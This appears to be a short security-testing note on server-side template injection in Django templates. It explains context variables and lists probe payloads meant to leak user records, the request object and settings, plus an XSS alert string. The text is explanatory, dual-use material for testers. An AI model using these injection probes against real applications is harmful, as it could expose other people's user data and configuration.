Django's own template system called Django Template Engine (DTL).
As a web framework Django needs a way to generate html dynamically. A django template is a text or document or a Python string marked-up using the Django template language. Normal Jinja payloads like {{ 7*7 }} or {{os.environ}} will not work, they will be rendered as text as Django works with context variables.
Context Variables
These are keys/values in the dictionary that the view passes to the template. Variables are placed within {{ and }}. https://docs.djangoproject.com/en/5.2/topics/templates/#variables
My first name is {{ first_name }}. My last name is {{ last_name }}.first_nameandlast_namehere are the context variables.
The dictionary which contains the context variables specifically for a user would like like
{'first_name': 'John', 'last_name': 'Doe'}Will which render to
My first name is John. My last name is Doe.So only variables that have defined in the dictionary can be called and explain why {{7*7}} wont work.
Finding injection
These values depend on what the programmer used to define the variables, so either user or username could be used. Inject different values and check responses.
# Might return username or AnonymousUser
{{ user }}
# Could return all user data
{{ users.values }}
# Index user
{{ users.3.username }}
# Request object
{{ request }}
# Example
{{ messages }}
{{ request }}
{{ settings.DEBUG }}
# XSS
{{'<script>alert(1)</script>'}}